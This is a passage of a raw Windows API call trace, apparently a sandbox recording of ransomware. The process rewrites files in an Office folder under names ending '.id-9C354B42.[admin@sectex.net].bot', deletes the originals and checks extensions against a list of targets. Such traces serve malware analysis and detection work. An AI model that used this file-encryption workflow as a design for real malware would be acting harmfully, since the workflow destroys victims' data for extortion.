	[0148.434] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore_k_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0148.435] GetLastError () returned 0x0
	[0148.435] ReadFile (in: hFile=0x31c, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x71, lpOverlapped=0x0) returned 1
	[0148.448] WriteFile (in: hFile=0x3d0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0148.450] ReadFile (in: hFile=0x31c, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.450] WriteFile (in: hFile=0x3d0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xf4, lpOverlapped=0x0) returned 1
	[0148.450] SetEndOfFile (hFile=0x3d0) returned 1
	[0148.450] CloseHandle (hObject=0x3d0) returned 1
	[0148.450] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.450] SetEndOfFile (hFile=0x31c) returned 1
	[0148.452] CloseHandle (hObject=0x31c) returned 1
	[0148.452] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.453] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore_k_col.hxk")) returned 1
	[0148.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_K_COL.HXK") returned 64
	[0148.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_K_COL.HXK") returned 64
	[0148.453] lstrlenW (lpString=".doc") returned 4
	[0148.453] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0148.453] lstrlenW (lpString=".docx") returned 5
	[0148.453] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0148.453] lstrlenW (lpString=".pdf") returned 4
	[0148.453] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0148.453] lstrlenW (lpString=".xls") returned 4
	[0148.453] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0148.453] lstrlenW (lpString=".xlsx") returned 5
	[0148.453] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0148.453] lstrlenW (lpString=".ppt") returned 4
	[0148.453] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0148.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_K_COL.HXK") returned 64
	[0148.454] lstrlenW (lpString=".zip") returned 4
	[0148.454] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0148.454] lstrlenW (lpString=".rar") returned 4
	[0148.454] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0148.454] lstrlenW (lpString=".bz2") returned 4
	[0148.454] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0148.454] lstrlenW (lpString=".7z") returned 3
	[0148.454] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0148.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_K_COL.HXK") returned 64
	[0148.454] lstrlenW (lpString=".dbf") returned 4
	[0148.454] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0148.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_K_COL.HXK") returned 64
	[0148.454] lstrlenW (lpString=".1cd") returned 4
	[0148.454] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0148.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_K_COL.HXK") returned 64
	[0148.454] lstrlenW (lpString=".jpg") returned 4
	[0148.454] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0148.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_K_COL.HXK") returned 64
	[0148.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_K_COL.HXK") returned 64
	[0148.454] lstrlenW (lpString=".doc") returned 4
	[0148.454] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0148.454] lstrlenW (lpString=".docx") returned 5
	[0148.454] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0148.454] lstrlenW (lpString=".pdf") returned 4
	[0148.454] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0148.454] lstrlenW (lpString=".xls") returned 4
	[0148.454] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0148.454] lstrlenW (lpString=".xlsx") returned 5
	[0148.454] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0148.454] lstrlenW (lpString=".ppt") returned 4
	[0148.455] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0148.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_K_COL.HXK") returned 64
	[0148.455] lstrlenW (lpString=".zip") returned 4
	[0148.455] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0148.455] lstrlenW (lpString=".rar") returned 4
	[0148.455] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0148.455] lstrlenW (lpString=".bz2") returned 4
	[0148.455] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0148.455] lstrlenW (lpString=".7z") returned 3
	[0148.455] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0148.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_K_COL.HXK") returned 64
	[0148.455] lstrlenW (lpString=".dbf") returned 4
	[0148.455] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0148.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_K_COL.HXK") returned 64
	[0148.455] lstrlenW (lpString=".1cd") returned 4
	[0148.455] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0148.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_K_COL.HXK") returned 64
	[0148.455] lstrlenW (lpString=".jpg") returned 4
	[0148.455] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0148.455] lstrcmpiW (lpString1=".VRD", lpString2=".bot") returned 1
	[0148.455] lstrlenW (lpString="NETWORK1.VRD") returned 12
	[0148.455] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK1.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\network1.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0148.466] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=1844) returned 1
	[0148.466] CloseHandle (hObject=0x31c) returned 1
	[0148.466] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK1.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\network1.vrd")) returned 0x20
	[0148.466] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK1.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\network1.vrd.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.466] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK1.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\network1.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0148.466] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.467] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.467] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK1.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\network1.vrd.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0148.467] GetLastError () returned 0x0
	[0148.467] ReadFile (in: hFile=0x31c, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x734, lpOverlapped=0x0) returned 1
	[0148.469] WriteFile (in: hFile=0x3d0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x740, lpOverlapped=0x0) returned 1
	[0148.470] ReadFile (in: hFile=0x31c, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.470] WriteFile (in: hFile=0x3d0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0148.470] SetEndOfFile (hFile=0x3d0) returned 1
	[0148.470] CloseHandle (hObject=0x3d0) returned 1
	[0148.470] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.470] SetEndOfFile (hFile=0x31c) returned 1
	[0148.472] CloseHandle (hObject=0x31c) returned 1
	[0148.473] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK1.VRD.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.473] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK1.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\network1.vrd")) returned 1
	[0148.475] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK1.VRD") returned 60
	[0148.475] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK1.VRD") returned 60
	[0148.476] lstrlenW (lpString=".doc") returned 4
	[0148.476] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0148.476] lstrlenW (lpString=".docx") returned 5
	[0148.476] lstrcmpiW (lpString1=".docx", lpString2="1.VRD") returned -1
	[0148.476] lstrlenW (lpString=".pdf") returned 4
	[0148.476] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0148.476] lstrlenW (lpString=".xls") returned 4
	[0148.476] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0148.476] lstrlenW (lpString=".xlsx") returned 5
	[0148.476] lstrcmpiW (lpString1=".xlsx", lpString2="1.VRD") returned -1
	[0148.476] lstrlenW (lpString=".ppt") returned 4
	[0148.476] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0148.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK1.VRD") returned 60
	[0148.476] lstrlenW (lpString=".zip") returned 4
	[0148.476] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0148.476] lstrlenW (lpString=".rar") returned 4
	[0148.476] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0148.476] lstrlenW (lpString=".bz2") returned 4
	[0148.476] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0148.476] lstrlenW (lpString=".7z") returned 3
	[0148.476] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0148.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK1.VRD") returned 60
	[0148.476] lstrlenW (lpString=".dbf") returned 4
	[0148.476] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0148.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK1.VRD") returned 60
	[0148.476] lstrlenW (lpString=".1cd") returned 4
	[0148.476] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0148.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK1.VRD") returned 60
	[0148.476] lstrlenW (lpString=".jpg") returned 4
	[0148.476] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0148.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK1.VRD") returned 60
	[0148.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK1.VRD") returned 60
	[0148.477] lstrlenW (lpString=".doc") returned 4
	[0148.477] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0148.477] lstrlenW (lpString=".docx") returned 5
	[0148.477] lstrcmpiW (lpString1=".docx", lpString2="1.VRD") returned -1
	[0148.477] lstrlenW (lpString=".pdf") returned 4
	[0148.477] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0148.477] lstrlenW (lpString=".xls") returned 4
	[0148.477] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0148.477] lstrlenW (lpString=".xlsx") returned 5
	[0148.477] lstrcmpiW (lpString1=".xlsx", lpString2="1.VRD") returned -1
	[0148.477] lstrlenW (lpString=".ppt") returned 4
	[0148.477] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0148.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK1.VRD") returned 60
	[0148.477] lstrlenW (lpString=".zip") returned 4
	[0148.477] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0148.477] lstrlenW (lpString=".rar") returned 4
	[0148.477] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0148.477] lstrlenW (lpString=".bz2") returned 4
	[0148.477] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0148.477] lstrlenW (lpString=".7z") returned 3
	[0148.477] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0148.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK1.VRD") returned 60
	[0148.477] lstrlenW (lpString=".dbf") returned 4
	[0148.477] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0148.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK1.VRD") returned 60
	[0148.477] lstrlenW (lpString=".1cd") returned 4
	[0148.477] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0148.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK1.VRD") returned 60
	[0148.477] lstrlenW (lpString=".jpg") returned 4
	[0148.477] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0148.478] lstrcmpiW (lpString1=".VRD", lpString2=".bot") returned 1
	[0148.478] lstrlenW (lpString="NETWORK2.VRD") returned 12
	[0148.478] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\network2.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0148.478] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=2150) returned 1
	[0148.478] CloseHandle (hObject=0x31c) returned 1
	[0148.478] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\network2.vrd")) returned 0x20
	[0148.478] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\network2.vrd.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.479] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\network2.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0148.479] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.479] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.479] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\network2.vrd.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0148.479] GetLastError () returned 0x0
	[0148.479] ReadFile (in: hFile=0x31c, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x866, lpOverlapped=0x0) returned 1
	[0148.481] WriteFile (in: hFile=0x3d0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x870, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x870, lpOverlapped=0x0) returned 1
	[0148.482] ReadFile (in: hFile=0x31c, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.482] WriteFile (in: hFile=0x3d0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0148.482] SetEndOfFile (hFile=0x3d0) returned 1
	[0148.483] CloseHandle (hObject=0x3d0) returned 1
	[0148.483] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.483] SetEndOfFile (hFile=0x31c) returned 1
	[0148.485] CloseHandle (hObject=0x31c) returned 1
	[0148.485] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.485] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\network2.vrd")) returned 1
	[0148.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD") returned 60
	[0148.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD") returned 60
	[0148.486] lstrlenW (lpString=".doc") returned 4
	[0148.486] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0148.486] lstrlenW (lpString=".docx") returned 5
	[0148.486] lstrcmpiW (lpString1=".docx", lpString2="2.VRD") returned -1
	[0148.486] lstrlenW (lpString=".pdf") returned 4
	[0148.486] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0148.486] lstrlenW (lpString=".xls") returned 4
	[0148.486] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0148.486] lstrlenW (lpString=".xlsx") returned 5
	[0148.486] lstrcmpiW (lpString1=".xlsx", lpString2="2.VRD") returned -1
	[0148.486] lstrlenW (lpString=".ppt") returned 4
	[0148.486] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0148.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD") returned 60
	[0148.486] lstrlenW (lpString=".zip") returned 4
	[0148.486] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0148.486] lstrlenW (lpString=".rar") returned 4
	[0148.486] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0148.486] lstrlenW (lpString=".bz2") returned 4
	[0148.486] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0148.486] lstrlenW (lpString=".7z") returned 3
	[0148.486] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0148.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD") returned 60
	[0148.486] lstrlenW (lpString=".dbf") returned 4
	[0148.486] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0148.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD") returned 60
	[0148.486] lstrlenW (lpString=".1cd") returned 4
	[0148.486] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0148.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD") returned 60
	[0148.487] lstrlenW (lpString=".jpg") returned 4
	[0148.487] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0148.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD") returned 60
	[0148.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD") returned 60
	[0148.487] lstrlenW (lpString=".doc") returned 4
	[0148.487] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0148.487] lstrlenW (lpString=".docx") returned 5
	[0148.487] lstrcmpiW (lpString1=".docx", lpString2="2.VRD") returned -1
	[0148.487] lstrlenW (lpString=".pdf") returned 4
	[0148.487] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0148.487] lstrlenW (lpString=".xls") returned 4
	[0148.487] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0148.487] lstrlenW (lpString=".xlsx") returned 5
	[0148.487] lstrcmpiW (lpString1=".xlsx", lpString2="2.VRD") returned -1
	[0148.487] lstrlenW (lpString=".ppt") returned 4
	[0148.487] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0148.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD") returned 60
	[0148.487] lstrlenW (lpString=".zip") returned 4
	[0148.487] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0148.487] lstrlenW (lpString=".rar") returned 4
	[0148.487] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0148.487] lstrlenW (lpString=".bz2") returned 4
	[0148.487] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0148.487] lstrlenW (lpString=".7z") returned 3
	[0148.487] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0148.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD") returned 60
	[0148.487] lstrlenW (lpString=".dbf") returned 4
	[0148.487] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0148.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD") returned 60
	[0148.488] lstrlenW (lpString=".1cd") returned 4
	[0148.488] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0148.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD") returned 60
	[0148.488] lstrlenW (lpString=".jpg") returned 4
	[0148.488] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0148.488] lstrcmpiW (lpString1=".VRD", lpString2=".bot") returned 1
	[0148.488] lstrlenW (lpString="NETWORK3.VRD") returned 12
	[0148.488] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK3.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\network3.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0148.489] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=3246) returned 1
	[0148.489] CloseHandle (hObject=0x31c) returned 1
	[0148.489] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK3.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\network3.vrd")) returned 0x20
	[0148.489] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK3.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\network3.vrd.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.489] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK3.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\network3.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0148.489] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.489] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.489] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK3.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\network3.vrd.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0148.490] GetLastError () returned 0x0
	[0148.490] ReadFile (in: hFile=0x31c, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0xcae, lpOverlapped=0x0) returned 1
